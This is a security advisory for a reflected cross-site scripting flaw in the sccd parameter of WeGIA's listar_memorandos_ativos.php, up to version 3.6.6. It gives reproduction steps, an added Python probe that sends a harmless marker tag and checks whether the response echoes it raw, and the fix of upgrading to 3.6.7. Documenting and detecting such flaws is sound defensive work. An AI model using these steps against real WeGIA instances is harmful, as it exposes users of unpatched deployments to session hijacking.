WeGIA Reflected Cross-Site Scripting Vulnerability in listar_memorandos_ativos.php Endpoint

Vulnerability

A reflected cross-site scripting vulnerability has been identified in WeGIA, a web management application for charitable institutions, in versions 3.6.6 and prior. The issue resides in the listar_memorandos_ativos.php endpoint, where the value of the sccd GET parameter is written into the HTML response without output encoding. An attacker can therefore place arbitrary HTML or JavaScript in that parameter, and any user who opens a crafted link has the injected content rendered and executed in their own browser session on the WeGIA origin.

Impact

Because the flaw is reflected rather than stored, exploitation requires a victim to follow an attacker-supplied link (or be redirected to it). When they do, the attacker's script runs with the victim's session in the WeGIA origin. Depending on the victim's role this could lead to session hijacking, unauthorized administrative actions performed on the victim's behalf, or convincing phishing content served from the legitimate application.

Reproduction

To reproduce this vulnerability, send a GET request to the listar_memorandos_ativos.php endpoint with the msg parameter set to 'success' and the sccd parameter set to an HTML or JavaScript payload. Because the value is echoed into the page without encoding, the browser renders the injected markup and executes any script it contains. A harmless marker tag is sufficient to confirm the raw sink; a script payload is not needed to demonstrate the issue.
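The probe below is an added example, not part of the advisory or of the WeGIA code base. It builds the request described above (msg=success, sccd set to a marker payload) and classifies a response body as echoing the parameter raw (vulnerable), echoing it HTML-entity-encoded (the behaviour one expects from a build that encodes output), or not reflecting it at all. The hostname, the sample response bodies and the marker value are constructed for the demonstration; only the endpoint and parameter names come from the advisory.

```python
"""
Added example (not WeGIA's own code): reflected-XSS probe for the
listar_memorandos_ativos.php / sccd sink described in the advisory.
Host, sample responses and the demo marker below are constructed.
"""
import html
import secrets
import urllib.parse
import urllib.request

ENDPOINT = "listar_memorandos_ativos.php"  # endpoint named in the advisory


def make_marker() -> str:
    """Random token so a hit cannot be confused with pre-existing page text."""
    return "xss" + secrets.token_hex(4)


def build_payload(marker: str) -> str:
    """Benign probe: closes an open attribute/tag, then opens a tag that
    cannot legitimately exist in the page. No alert() is needed to prove
    the sink is unencoded."""
    return f'"><{marker}>'


def build_url(base_url: str, payload: str) -> str:
    """GET .../listar_memorandos_ativos.php?msg=success&sccd=<payload>,
    following the reproduction steps (msg must be 'success')."""
    query = urllib.parse.urlencode({"msg": "success", "sccd": payload})
    return f"{base_url.rstrip('/')}/{ENDPOINT}?{query}"


def classify_reflection(body: str, marker: str) -> str:
    """
    'vulnerable': payload (or at least the raw marker tag) echoed verbatim,
                  so the injected markup breaks out of its context
    'escaped':    payload present only as HTML entities (&quot;&gt;&lt;...),
                  which is what an output-encoding fix produces
    'absent':     the parameter is not reflected in this response
    """
    payload = build_payload(marker)
    if payload in body or f"<{marker}" in body:
        return "vulnerable"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Live check against an instance you are authorised to test.
    Not called in demo() so the example runs offline."""
    marker = make_marker()
    url = build_url(base_url, build_payload(marker))
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify_reflection(body, marker)


def demo() -> dict:
    """Runs the classifier over constructed responses standing in for a
    vulnerable server, a server that encodes output, and an unrelated page."""
    marker = "xss0badc0de"  # fixed token so the sample bodies line up
    payload = build_payload(marker)
    raw_echo = f'<input type="hidden" name="sccd" value="{payload}">'
    encoded_echo = (
        '<input type="hidden" name="sccd" '
        f'value="{html.escape(payload, quote=True)}">'
    )
    unrelated = "<p>Memorando criado com sucesso.</p>"
    return {
        # example.test is a reserved test domain; not a real WeGIA host
        "url": build_url("https://wegia.example.test", payload),
        "raw": classify_reflection(raw_echo, marker),
        "encoded": classify_reflection(encoded_echo, marker),
        "none": classify_reflection(unrelated, marker),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The marker check (`<marker` appearing raw) is kept separate from the full-payload check so that a filter which strips quotes but leaves angle brackets untouched is still reported as vulnerable rather than silently falling through to 'absent'. Entity forms differ slightly between encoders (Python's html.escape and PHP's htmlspecialchars agree on the characters used here, but not on the apostrophe), so a payload containing a single quote would need the alternative entity added to the 'escaped' check.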

Remediation

Upgrade to WeGIA version 3.6.7, which addresses this vulnerability.

Added: Mar 20, 2026, 11:20 AM
Updated: Mar 20, 2026, 11:20 AM

Vulnerability Rating

Custom Algorithm

spread          0.0
impact          1.7
exploitability  5.6
remediation     7.7
relevance       4.2
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.